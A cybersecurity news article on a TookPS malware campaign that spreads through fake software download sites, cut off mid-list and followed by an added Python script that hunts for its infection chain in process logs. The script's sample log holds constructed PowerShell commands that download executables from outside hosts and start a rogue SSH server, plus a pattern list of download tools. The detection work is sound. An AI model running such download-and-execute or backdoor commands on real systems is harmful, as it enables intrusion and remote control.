Hackers Use DeepSeek and Remote Desktop Apps to Deploy TookPS Malware


A recent investigation by cybersecurity researchers has uncovered a large-scale malware campaign leveraging the DeepSeek LLM and popular remote desktop applications to distribute the Trojan-Downloader.Win32.TookPS malware.

The attackers targeted both individual users and organizations by disguising malicious software as legitimate business tools, including UltraViewer, AutoCAD, and SketchUp.

Malicious Infrastructure and Infection Chain

The TookPS malware campaign begins with fraudulent websites mimicking official download pages for widely used software.

Malicious websites

These sites lure victims into downloading compromised files, such as “Ableton.exe” or “QuickenApp.exe,” which are disguised as legitimate applications.

Once installed, the TookPS downloader initiates communication with a command-and-control (C2) server embedded in its code.

This server delivers a series of PowerShell commands designed to download additional malicious payloads.

The infection chain involves three key stages:

  1. Payload Delivery: The first PowerShell script downloads an SSH server executable (“sshd.exe”) along with its configuration and RSA key ...
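The chain the article describes (a PowerShell download from a C2, followed by an SSH server dropped and started from a user-writable path) is straightforward to hunt for in process-creation telemetry. The script below is an added example written for this page, not code from the article or from the researchers it cites. It assumes a constructed, Sysmon-like log format (`timestamp|host|parent image|image|command line`); the hostnames, IP addresses and file paths in the sample lines are constructed and are not indicators from the campaign.

```python
"""Hunt for a TookPS-style chain in process-creation logs:
Rule 1: PowerShell invoking a download primitive with a URL on its command line.
Rule 2: sshd.exe running from outside the OpenSSH install directories.
Chain : both on the same host, the download preceding the rogue sshd.exe within a window.
Log format and sample lines are constructed for this example."""
import ntpath
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample telemetry: <ISO timestamp>|<host>|<parent image>|<image>|<command line>
SAMPLE_LOG = r"""
2025-03-20T10:01:02|WS-17|C:\Users\jdoe\Downloads\Ableton.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden -c "Invoke-WebRequest http://203.0.113.10/sshd.exe -OutFile C:\ProgramData\sshd.exe"
2025-03-20T10:01:05|WS-17|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\ProgramData\sshd.exe|C:\ProgramData\sshd.exe -f C:\ProgramData\sshd_config
2025-03-20T11:15:00|WS-22|C:\Windows\System32\services.exe|C:\Windows\System32\OpenSSH\sshd.exe|C:\Windows\System32\OpenSSH\sshd.exe
2025-03-20T11:20:00|WS-22|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "Get-Process"
2025-03-20T12:00:00|WS-31|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/update.exe','C:\Users\Public\update.exe')"
"""

DOWNLOAD_PRIMITIVES = re.compile(
    r"\b(Invoke-WebRequest|iwr|curl|wget|DownloadFile|DownloadString|Start-BitsTransfer)\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)
# Directories where a legitimate Windows OpenSSH server binary lives (lower-cased for comparison).
EXPECTED_SSHD_DIRS = {r"c:\windows\system32\openssh", r"c:\program files\openssh"}


@dataclass
class Event:
    ts: datetime
    host: str
    parent: str
    image: str
    cmdline: str


def parse_log(text):
    """Parse the pipe-delimited constructed format into Event records."""
    events = []
    for line in text.strip().splitlines():
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append(Event(datetime.fromisoformat(ts), host, parent, image, cmdline))
    return events


def is_powershell(image):
    return ntpath.basename(image).lower() in ("powershell.exe", "pwsh.exe")


def powershell_download(ev):
    """Rule 1: PowerShell plus a download cmdlet/method plus a URL on the command line."""
    return (is_powershell(ev.image)
            and DOWNLOAD_PRIMITIVES.search(ev.cmdline) is not None
            and URL_RE.search(ev.cmdline) is not None)


def rogue_sshd(ev):
    """Rule 2: sshd.exe executing from anywhere other than the OpenSSH install directories."""
    return (ntpath.basename(ev.image).lower() == "sshd.exe"
            and ntpath.dirname(ev.image).lower() not in EXPECTED_SSHD_DIRS)


def scan(events, window=timedelta(minutes=10)):
    """Return per-rule hits plus correlated chains (download -> rogue sshd on one host)."""
    downloads = [e for e in events if powershell_download(e)]
    sshds = [e for e in events if rogue_sshd(e)]
    chains = []
    for sshd in sshds:
        # Downloads on the same host that happened before the sshd start, within the window.
        prior = [d for d in downloads
                 if d.host == sshd.host and timedelta(0) <= sshd.ts - d.ts <= window]
        if prior:
            latest = max(prior, key=lambda d: d.ts)
            chains.append({
                "host": sshd.host,
                "download_url": URL_RE.search(latest.cmdline).group(0),
                "sshd_path": sshd.image,
                "spawned_by_powershell": is_powershell(sshd.parent),
            })
    return {"downloads": downloads, "rogue_sshd": sshds, "chains": chains}


if __name__ == "__main__":
    result = scan(parse_log(SAMPLE_LOG))
    for finding in result["chains"]:
        print("TookPS-like chain:", finding)
    print(f"{len(result['downloads'])} PowerShell download(s), "
          f"{len(result['rogue_sshd'])} rogue sshd.exe start(s)")
```

On the sample data only WS-17 produces a correlated chain; WS-22's sshd.exe is the stock OpenSSH service and is ignored, and WS-31's download alone is surfaced as a lower-confidence single-rule hit. The two single rules are deliberately kept separate from the correlation so that either can be tuned (for example, adding an allow-list of update URLs) without losing the high-confidence chain alert.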

Copyright of this story solely belongs to gbhackers.